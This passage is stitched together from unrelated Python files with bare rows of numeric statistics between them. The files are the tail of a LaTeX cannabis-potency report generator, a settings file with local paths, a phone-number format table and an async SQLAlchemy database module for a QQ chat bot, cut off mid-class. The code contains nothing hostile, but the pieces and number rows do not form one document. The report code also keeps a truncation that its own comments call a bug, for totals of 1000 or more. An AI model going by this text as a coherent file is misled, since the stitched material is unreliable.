Material will be held for up to 3 weeks unless alternative arrangements have been made. Sample holding time may vary and is dependent on MBL license restrictions.
\newline\newline\newline
R. Bilodeau \phantom{aaaaaaaaaaaaaaaaaaaaaaaaaxaaaaaasasssssssssssss}H. Hartmann\\ Analytical Chemist: \underline{\hspace{3cm}}{ \hspace{3.2cm} Sr. Analytical Chemist: \underline{\hspace{3cm}}
\fancyfoot[C]{\textbf{MB Laboratories Ltd.}\\ \textbf{Web:} www.mblabs.com}
\fancyfoot[R]{\textbf{Mail:} PO Box 2103\\ Sidney, B.C., V8L 356}
\fancyfoot[L]{\textbf{T:} 250 656 1334\\ \textbf{E:} info@mblabs.com}
\end{document}
"""
    return footer_string
def round_down_to_correct_decimal_point(self, data_value):
    """Truncate a numeric result to the precision shown on reports.

    data_value -- a number (pandas lookups may yield NaN).
    Returns a display string: [1, 100) keeps one decimal ('12.3'),
    (0, 1) keeps three decimals ('0.123'), >= 100 keeps the whole
    integer part, and zero/negative/NaN renders as 'ND'.
    """
    if 100 > data_value >= 1:
        # e.g. 12.345 -> '12.3' (four characters keeps one decimal place).
        return str(data_value)[0:4]
    elif 1 > data_value > 0:
        # e.g. 0.1234 -> '0.123'.
        return str(data_value)[0:5]
    elif data_value >= 100:
        # BUG FIX: the old str(value)[0:3] slice mangled values >= 1000
        # (1000.0 -> '100'); keep the full integer part instead.
        return str(int(data_value))
    else:
        # Zero, negative, or NaN (all comparisons above are False for NaN).
        return 'ND'
def create_total_line(self, total_line_type, report_type, cannabinoid, data):
    """Compute the 'Total THC' / 'Total CBD' row for a potency table.

    The total is main + acid * 0.877 (the decarboxylation mass factor used
    throughout these reports); 'ND' inputs count as zero, and a total of
    zero (or less) renders as 'ND'.

    total_line_type -- 'regular' (data entries are plain value strings,
        returns one display string) or 'unit' (entries are
        [value, unit_value] pairs, returns [display, display_unit]).
    report_type -- 'basic' selects the basic data indices; anything else
        selects the deluxe indices.
    cannabinoid -- 'THC'; any other value means CBD.

    Refactor note: the original repeated the same ND-coercion and
    truncation ladder five times; behavior is unchanged.
    """
    def _numeric(value):
        # 'ND' (none detected) contributes nothing to the total.
        return 0.0 if value == 'ND' else float(value)

    def _display(total):
        # Same truncation (not rounding) ladder used for analyte values.
        if 100 > total >= 1:
            return str(total)[0:4]
        elif 1 > total > 0:
            return str(total)[0:5]
        elif total >= 100:
            return str(total)[0:3]
        return 'ND'

    # Data indices of the main cannabinoid and its acid per report layout.
    if cannabinoid == 'THC':
        main_index, acid_index = (5, 6) if report_type == 'basic' else (11, 16)
    else:
        main_index, acid_index = (1, 2) if report_type == 'basic' else (5, 7)

    if total_line_type == 'unit':
        total_value = _numeric(data[main_index][0]) + _numeric(data[acid_index][0]) * 0.877
        total_unit = _numeric(data[main_index][1]) + _numeric(data[acid_index][1]) * 0.877
        return [_display(total_value), _display(total_unit)]
    elif total_line_type == 'regular':
        total = _numeric(data[main_index]) + _numeric(data[acid_index]) * 0.877
        return _display(total)
| 61.386445
| 203
| 0.539864
| 5,934
| 51,626
| 4.346983
| 0.04213
| 0.064896
| 0.11793
| 0.053034
| 0.924792
| 0.881256
| 0.866214
| 0.830393
| 0.822252
| 0.753828
| 0
| 0.037324
| 0.32534
| 51,626
| 840
| 204
| 61.459524
| 0.703273
| 0.004688
| 0
| 0.700614
| 0
| 0.022086
| 0.1822
| 0.040547
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02454
| false
| 0
| 0
| 0
| 0.046626
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
857c388eec003a840321502b9c2f63819c6e92f3
| 117
|
py
|
Python
|
hfnet/settings.py
|
CaiYingFeng/hfnet
|
b430d0fb192fccbd42e6a19e06eeda5b805e2d1c
|
[
"MIT"
] | null | null | null |
hfnet/settings.py
|
CaiYingFeng/hfnet
|
b430d0fb192fccbd42e6a19e06eeda5b805e2d1c
|
[
"MIT"
] | null | null | null |
hfnet/settings.py
|
CaiYingFeng/hfnet
|
b430d0fb192fccbd42e6a19e06eeda5b805e2d1c
|
[
"MIT"
] | null | null | null |
# Root directory holding the localization datasets.
DATA_PATH = '/media/autolab/disk_4T/cyf/localization/data'
# Output directory for experiment artifacts (PEP 8: space around '=').
EXPER_PATH = '/media/autolab/disk_4T/cyf/localization/out'
| 39
| 58
| 0.803419
| 18
| 117
| 5
| 0.555556
| 0.2
| 0.355556
| 0.444444
| 0.822222
| 0.822222
| 0.822222
| 0
| 0
| 0
| 0
| 0.017857
| 0.042735
| 117
| 2
| 59
| 58.5
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0.74359
| 0.74359
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
857c646d18b551c8368c06a8d35a42922cfbf94a
| 532
|
py
|
Python
|
python/phonenumbers/data/alt_format_381.py
|
rodgar-nvkz/python-phonenumbers
|
4c7c4892211dbc9bc328bc3356b03853eaf993dc
|
[
"Apache-2.0"
] | 2,424
|
2015-01-05T05:34:45.000Z
|
2022-03-28T22:37:53.000Z
|
python/phonenumbers/data/alt_format_381.py
|
rodgar-nvkz/python-phonenumbers
|
4c7c4892211dbc9bc328bc3356b03853eaf993dc
|
[
"Apache-2.0"
] | 166
|
2015-01-30T23:59:18.000Z
|
2022-03-14T21:08:42.000Z
|
Lib/site-packages/phonenumbers/data/alt_format_381.py
|
PsychedVic/Portafolio
|
4bd59d19de41fbea5317d4f2b9e6219ea0359945
|
[
"bzip2-1.0.6"
] | 345
|
2015-01-02T00:33:27.000Z
|
2022-03-26T13:06:57.000Z
|
"""Auto-generated file, do not edit by hand. 381 metadata"""
from ..phonemetadata import NumberFormat
PHONE_ALT_FORMAT_381 = [NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['[16]|2[0-24-7]|3[0-8]|(?:2[389]|39)[2-9]']), NumberFormat(pattern='(\\d{2})(\\d{2})(\\d{2})(\\d{3})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['1|2[0-24-7]|3[0-8]|(?:2[389]|39)[2-9]']), NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{2})(\\d{2})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['6'])]
| 106.4
| 428
| 0.578947
| 96
| 532
| 3.114583
| 0.354167
| 0.046823
| 0.060201
| 0.210702
| 0.591973
| 0.58194
| 0.541806
| 0.45485
| 0.254181
| 0.254181
| 0
| 0.128257
| 0.06203
| 532
| 4
| 429
| 133
| 0.470942
| 0.101504
| 0
| 0
| 1
| 1
| 0.438559
| 0.349576
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
858bc09426cf6ef21f9aca0841b4f653a02e3b56
| 44,049
|
py
|
Python
|
src/utils/database.py
|
AmemachiF/Hairpin
|
82040ab45f062787da759cddfa4a24913ee49f07
|
[
"MIT"
] | 2
|
2021-10-21T00:01:16.000Z
|
2021-12-16T14:13:55.000Z
|
src/utils/database.py
|
AmemachiF/Hairpin
|
82040ab45f062787da759cddfa4a24913ee49f07
|
[
"MIT"
] | null | null | null |
src/utils/database.py
|
AmemachiF/Hairpin
|
82040ab45f062787da759cddfa4a24913ee49f07
|
[
"MIT"
] | 1
|
2021-12-09T14:49:28.000Z
|
2021-12-09T14:49:28.000Z
|
# @Author: South
# @Date: 2021-08-14 10:56
from datetime import datetime
import nonebot
from sqlalchemy import Column, Integer, String, BLOB, DATETIME, select, distinct, func, Boolean, Text
from sqlalchemy.exc import NoResultFound, MultipleResultsFound
from sqlalchemy.ext.asyncio import create_async_engine, AsyncSession
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from src.utils.result import Result
# Project configuration exposed by the running NoneBot driver.
global_config = nonebot.get_driver().config
__PROJECT_ROOT__ = global_config.project_root
try:
    # Async SQLite engine (via aiosqlite) backing Hairpin.db in the project root.
    engine = create_async_engine(f"sqlite+aiosqlite:///{__PROJECT_ROOT__}/Hairpin.db", encoding="utf8",
                                 pool_recycle=3600, pool_pre_ping=True, echo=False, future=True)
except Exception as exp:
    import sys
    # Message reads "failed to create the database connection"; abort startup.
    nonebot.logger.opt(colors=True).critical(f"<r>创建数据库连接失败</r>, error: {repr(exp)}")
    sys.exit("创建数据库连接失败")
async def database_init():
    """Create all ORM tables at startup; terminate the process on failure."""
    try:
        # Initialize the database schema.
        async with engine.begin() as conn:
            await conn.run_sync(Base.metadata.create_all)
        # Log message reads "initializing database... done".
        nonebot.logger.opt(colors=True).debug(f"<lc>初始化数据库...</lc><lg>完成</lg>")
    except Exception as e:
        import sys
        # Message reads "database initialization failed"; abort startup.
        nonebot.logger.opt(colors=True).critical(f"<r>数据库初始化失败</r>, error: {repr(e)}")
        sys.exit("数据库初始化失败")
# Initialize the database when the bot driver starts up.
nonebot.get_driver().on_startup(database_init)
# Declarative base bound to the async engine; the ORM models inherit from it.
Base = declarative_base(engine)
class DB(object):
    """Provides the application's shared SQLAlchemy async session factory."""

    def __init__(self):
        # expire_on_commit=False keeps ORM attribute values readable after
        # a commit, so objects remain usable once the session closes.
        self._session_factory = sessionmaker(
            engine, expire_on_commit=False, class_=AsyncSession
        )

    def get_async_session(self):
        """Return the session factory; call it to open an AsyncSession."""
        return self._session_factory
class Dynamic_Record(Base):
    """ORM model: one stored dynamic (feed post) per row, keyed by dynamic_id.

    NOTE(review): uid presumably matches the 'B站UID' (Bilibili UID) used by
    Dynamic_Subscription — confirm against callers.
    """
    __tablename__ = "Dynamic_Record"
    id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
    uid = Column(String(25), nullable=False, primary_key=False)
    dynamic_id = Column(String(25), nullable=False, primary_key=False)
    content = Column(BLOB, nullable=False, primary_key=False)
    time = Column(DATETIME, nullable=False, primary_key=False, default=datetime.now)

    def __init__(self, uid: str):
        self.uid = uid

    async def insert(self, dynamic_id: str, content: bytes, time=None):
        """Insert this record unless a row with the same dynamic_id exists.

        BUG FIX: the default used to be `time=datetime.now()`, which Python
        evaluates once at definition time, stamping every record with the
        module-import timestamp. `None` now means "now, at call time";
        callers that pass an explicit time are unaffected.
        """
        self.dynamic_id = dynamic_id
        self.content = content
        self.time = time if time is not None else datetime.now()
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        result = await self.select(dynamic_id)
                        # select() signals "no existing row" with result == 1.
                        if not result.error and result.result == 1:
                            session.add(self)
                            result = Result.IntResult(error=False, info="Insert_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select(self, dynamic_id: str):
        """Look up a record by dynamic_id.

        Returns Result.IntResult with info 'Exist' (result = the record),
        'Select_No_Result' (result = 1), or an error (result = -1).
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Dynamic_Record).where(
                            Dynamic_Record.dynamic_id == dynamic_id))
                        record = session_result.scalar_one()
                        result = Result.IntResult(error=False, info="Exist", result=record)
                    except NoResultFound:
                        result = Result.IntResult(error=False, info="Select_No_Result", result=1)
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select_last_dynamic_id(self):
        """Return the maximum dynamic_id stored for this uid.

        Returns Result.IntResult with info 'Exist' (result = max id) or
        'Select_No_Result' (result = 1) when no rows match.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(func.max(Dynamic_Record.dynamic_id)).where(
                            Dynamic_Record.uid == self.uid))
                        record = session_result.scalar_one()
                        if record:
                            result = Result.IntResult(error=False, info="Exist", result=record)
                        else:
                            result = Result.IntResult(error=False, info="Select_No_Result", result=1)
                    except NoResultFound:
                        result = Result.IntResult(error=False, info="Select_No_Result", result=1)
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result
class Dynamic_Subscription(Base):
    """Maps a bilibili dynamic-feed subscription (uid) to a QQ subscriber.

    All helpers return Result.IntResult / Result.ListResult instead of
    raising, so callers branch on ``result.error`` / ``result.result``.
    """
    __tablename__ = "Dynamic_Subscription"
    id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
    bot_id = Column(String(16), nullable=False, comment="Bot_id")
    uid = Column(String(16), nullable=False, comment="B站UID")
    subscriber_id = Column(String(16), nullable=False, comment="QQ/群号")
    send_type = Column(String(10), nullable=False, comment="私聊/群")

    def __init__(self, bot_id: str, uid: str, subscriber_id: str, send_type: str):
        """Populate column values only; no database I/O happens here."""
        self.bot_id = bot_id
        self.uid = uid
        self.subscriber_id = subscriber_id
        self.send_type = send_type

    async def insert(self):
        """Add this subscription unless a (uid, subscriber_id) row already exists.

        Returns Result.IntResult: 1 on success, -1 on error; when a duplicate
        exists the prior select() result is returned unchanged.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        # select() opens its own session; result.result == 1 means "not present".
                        result = await self.select()
                        if not result.error and result.result == 1:
                            session.add(self)
                            result = Result.IntResult(error=False, info="Insert_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                # NOTE: session.begin() commits on successful exit; this commit is redundant.
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def delete(self):
        """Delete the row matching (self.uid, self.subscriber_id) if present.

        Returns Result.IntResult: 1 on success, -1 on error; when no row
        matched the select() result is passed through unchanged.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        result = await self.select()
                        if not result.error and isinstance(result.result, Dynamic_Subscription):
                            await session.delete(result.result)
                            result = Result.IntResult(error=False, info="Delete_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select(self):
        """Fetch the single row matching (self.uid, self.subscriber_id).

        Returns Result.IntResult: the ORM object in ``result`` when found,
        1 when absent, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Dynamic_Subscription).where(
                            Dynamic_Subscription.uid == self.uid).where(
                            Dynamic_Subscription.subscriber_id == self.subscriber_id))
                        subscription = session_result.scalar_one()
                        result = Result.IntResult(error=False, info="Exist", result=subscription)
                    except NoResultFound:
                        result = Result.IntResult(error=False, info="Select_No_Result", result=1)
                    except MultipleResultsFound:
                        result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select_subscribers(self):
        """List every subscription row for self.uid (Result.ListResult)."""
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Dynamic_Subscription).where(
                            Dynamic_Subscription.uid == self.uid))
                        result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
                    except NoResultFound:
                        result = Result.ListResult(error=False, info="Select_No_Result", result=[])
                    except MultipleResultsFound:
                        result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
            except Exception as e:
                result = Result.ListResult(error=True, info=repr(e), result=[])
        return result

    async def select_uids(self):
        """List the distinct uids with at least one subscription (Result.ListResult)."""
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(distinct(Dynamic_Subscription.uid)))
                        result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
                    except NoResultFound:
                        result = Result.ListResult(error=False, info="Select_No_Result", result=[])
                    except MultipleResultsFound:
                        result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
            except Exception as e:
                result = Result.ListResult(error=True, info=repr(e), result=[])
        return result
class Live_Subscription(Base):
    """Maps a bilibili live-stream subscription (uid) to a QQ subscriber.

    Structurally identical to Dynamic_Subscription; all helpers return
    Result.IntResult / Result.ListResult rather than raising.
    """
    __tablename__ = "Live_Subscription"
    id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
    bot_id = Column(String(16), nullable=False, comment="Bot_id")
    uid = Column(String(16), nullable=False, comment="B站UID")
    subscriber_id = Column(String(16), nullable=False, comment="QQ/群号")
    send_type = Column(String(10), nullable=False, comment="1:QQ 2:群")

    def __init__(self, bot_id: str, uid: str, subscriber_id: str, send_type: str):
        """Populate column values only; no database I/O happens here."""
        self.bot_id = bot_id
        self.uid = uid
        self.subscriber_id = subscriber_id
        self.send_type = send_type

    async def insert(self):
        """Add this subscription unless a (uid, subscriber_id) row already exists.

        Returns Result.IntResult: 1 on success, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        # select() opens its own session; result.result == 1 means "not present".
                        result = await self.select()
                        if not result.error and result.result == 1:
                            session.add(self)
                            result = Result.IntResult(error=False, info="Insert_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                # NOTE: session.begin() commits on successful exit; this commit is redundant.
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def delete(self):
        """Delete the row matching (self.uid, self.subscriber_id) if present.

        Returns Result.IntResult: 1 on success, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        result = await self.select()
                        if not result.error and isinstance(result.result, Live_Subscription):
                            await session.delete(result.result)
                            result = Result.IntResult(error=False, info="Delete_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select(self):
        """Fetch the single row matching (self.uid, self.subscriber_id).

        Returns Result.IntResult: the ORM object in ``result`` when found,
        1 when absent, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Live_Subscription).where(
                            Live_Subscription.uid == self.uid).where(
                            Live_Subscription.subscriber_id == self.subscriber_id))
                        subscription = session_result.scalar_one()
                        result = Result.IntResult(error=False, info="Exist", result=subscription)
                    except NoResultFound:
                        result = Result.IntResult(error=False, info="Select_No_Result", result=1)
                    except MultipleResultsFound:
                        result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select_subscribers(self):
        """List every subscription row for self.uid (Result.ListResult)."""
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Live_Subscription).where(
                            Live_Subscription.uid == self.uid))
                        result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
                    except NoResultFound:
                        result = Result.ListResult(error=False, info="Select_No_Result", result=[])
                    except MultipleResultsFound:
                        result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
            except Exception as e:
                result = Result.ListResult(error=True, info=repr(e), result=[])
        return result

    async def select_uids(self):
        """List the distinct uids with at least one subscription (Result.ListResult)."""
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(distinct(Live_Subscription.uid)))
                        result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
                    except NoResultFound:
                        result = Result.ListResult(error=False, info="Select_No_Result", result=[])
                    except MultipleResultsFound:
                        result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
            except Exception as e:
                result = Result.ListResult(error=True, info=repr(e), result=[])
        return result
class Welcome_Subscription(Base):
    """Per-group welcome-message configuration (one row per group).

    All helpers return Result.IntResult / Result.ListResult rather than raising.
    """
    __tablename__ = "Welcome_Subscription"
    id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
    subscriber_id = Column(String(16), nullable=False, comment="群号")
    status = Column(Boolean, nullable=False, comment="状态")
    content = Column(Text, nullable=False, comment="内容")

    def __init__(self, subscriber_id: str, status: bool, content: str):
        """Populate column values only; no database I/O happens here."""
        self.subscriber_id = subscriber_id
        self.status = status
        self.content = content

    async def insert(self):
        """Add this row unless one already exists for self.subscriber_id.

        Returns Result.IntResult: 1 on success, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        # select() opens its own session; result.result == 1 means "not present".
                        result = await self.select()
                        if not result.error and result.result == 1:
                            session.add(self)
                            result = Result.IntResult(error=False, info="Insert_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                # NOTE: session.begin() commits on successful exit; this commit is redundant.
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def delete(self):
        """Delete the row for self.subscriber_id if present.

        Returns Result.IntResult: 1 on success, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        result = await self.select()
                        if not result.error and isinstance(result.result, Welcome_Subscription):
                            await session.delete(result.result)
                            result = Result.IntResult(error=False, info="Delete_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select(self):
        """Fetch the single row for self.subscriber_id.

        Returns Result.IntResult: the ORM object in ``result`` when found,
        1 when absent, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Welcome_Subscription).where(
                            Welcome_Subscription.subscriber_id == self.subscriber_id))
                        subscription = session_result.scalar_one()
                        result = Result.IntResult(error=False, info="Exist", result=subscription)
                    except NoResultFound:
                        result = Result.IntResult(error=False, info="Select_No_Result", result=1)
                    except MultipleResultsFound:
                        result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select_subscribers(self):
        """List rows whose status equals self.status (Result.ListResult).

        # NOTE(review): unlike the sibling classes this filters by status,
        # not by uid — presumably "all groups with welcome enabled/disabled".
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(
                            select(Welcome_Subscription).where(Welcome_Subscription.status == self.status))
                        result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
                    except NoResultFound:
                        result = Result.ListResult(error=False, info="Select_No_Result", result=[])
                    except MultipleResultsFound:
                        result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
            except Exception as e:
                result = Result.ListResult(error=True, info=repr(e), result=[])
        return result
class Task_Subscription(Base):
    """A scheduled message task: content sent to subscriber_id every interval_time.

    All helpers return Result.IntResult / Result.ListResult rather than raising.
    """
    __tablename__ = "Task_Subscription"
    id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
    bot_id = Column(String(16), nullable=False, comment="Bot_id")
    subscriber_id = Column(String(16), nullable=False, comment="qq/群号")
    interval_time = Column(Integer, nullable=False, comment="间隔时间")
    content = Column(Text, nullable=False, comment="内容")
    send_type = Column(String(10), nullable=False, comment="私聊/群")

    def __init__(self, bot_id: str, subscriber_id: str, interval_time: int, content: str, send_type: str):
        """Populate column values only; no database I/O happens here."""
        self.bot_id = bot_id
        self.subscriber_id = subscriber_id
        self.interval_time = interval_time
        self.content = content
        self.send_type = send_type

    async def insert(self):
        """Add this task unless select() already finds a row with the same id.

        # NOTE(review): select() filters on self.id, which is None for a
        # freshly constructed instance until flushed — confirm intended.
        Returns Result.IntResult: 1 on success, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        result = await self.select()
                        if not result.error and result.result == 1:
                            session.add(self)
                            result = Result.IntResult(error=False, info="Insert_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                # NOTE: session.begin() commits on successful exit; this commit is redundant.
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def delete(self):
        """Delete the task found by select_by_self() if present.

        Returns Result.IntResult: 1 on success, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        result = await self.select_by_self()
                        if not result.error and isinstance(result.result, Task_Subscription):
                            await session.delete(result.result)
                            result = Result.IntResult(error=False, info="Delete_Success", result=1)
                    except Exception as e:
                        result = Result.IntResult(error=True, info=repr(e), result=-1)
                await session.commit()
            except MultipleResultsFound:
                result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select(self):
        """Fetch the single row whose primary key equals self.id.

        Returns Result.IntResult: the ORM object in ``result`` when found,
        1 when absent, -1 on error.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Task_Subscription).where(
                            Task_Subscription.id == self.id))
                        subscription = session_result.scalar_one()
                        result = Result.IntResult(error=False, info="Exist", result=subscription)
                    except NoResultFound:
                        result = Result.IntResult(error=False, info="Select_No_Result", result=1)
                    except MultipleResultsFound:
                        result = Result.IntResult(error=True, info="Multiple_Results_Found", result=-1)
            except Exception as e:
                result = Result.IntResult(error=True, info=repr(e), result=-1)
        return result

    async def select_all(self):
        """List every task row in the table (Result.ListResult)."""
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(select(Task_Subscription))
                        result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
                    except NoResultFound:
                        result = Result.ListResult(error=False, info="Select_No_Result", result=[])
                    except MultipleResultsFound:
                        result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
            except Exception as e:
                result = Result.ListResult(error=True, info=repr(e), result=[])
        return result

    async def select_by_self(self):
        """Fetch the single row matching (subscriber_id, bot_id, id).

        # NOTE(review): inconsistently wraps a single ORM object (or a
        # placeholder list on no-result) in Result.ListResult, unlike the
        # other select() methods which use IntResult — confirm callers
        # before normalizing.
        """
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(
                            select(Task_Subscription).where(
                                Task_Subscription.subscriber_id == self.subscriber_id).where(
                                Task_Subscription.bot_id == self.bot_id).where(Task_Subscription.id == self.id))
                        subscription = session_result.scalar_one()
                        result = Result.ListResult(error=False, info="Exist", result=subscription)
                    except NoResultFound:
                        result = Result.ListResult(error=False, info="Select_No_Result", result=["啥也没有"])
                    except MultipleResultsFound:
                        result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
            except Exception as e:
                result = Result.ListResult(error=True, info=repr(e), result=[])
        return result

    async def select_all_by_self(self):
        """List every task for (self.subscriber_id, self.bot_id) (Result.ListResult)."""
        async_session = DB().get_async_session()
        async with async_session() as session:
            try:
                async with session.begin():
                    try:
                        session_result = await session.execute(
                            select(Task_Subscription).where(
                                Task_Subscription.subscriber_id == self.subscriber_id).where(
                                Task_Subscription.bot_id == self.bot_id))
                        result = Result.ListResult(error=False, info="Exist", result=session_result.scalars().all())
                    except NoResultFound:
                        result = Result.ListResult(error=False, info="Select_No_Result", result=[])
                    except MultipleResultsFound:
                        result = Result.ListResult(error=True, info="Multiple_Results_Found", result=[])
            except Exception as e:
                result = Result.ListResult(error=True, info=repr(e), result=[])
        return result
class Recipes(Base):
    """A named recipe stored as an image blob, keyed by dish name.

    All helpers return Result.IntResult / Result.ListResult rather than raising.
    """
    __tablename__ = "Recipes"
    id = Column(Integer, nullable=False, primary_key=True, index=True, autoincrement=True)
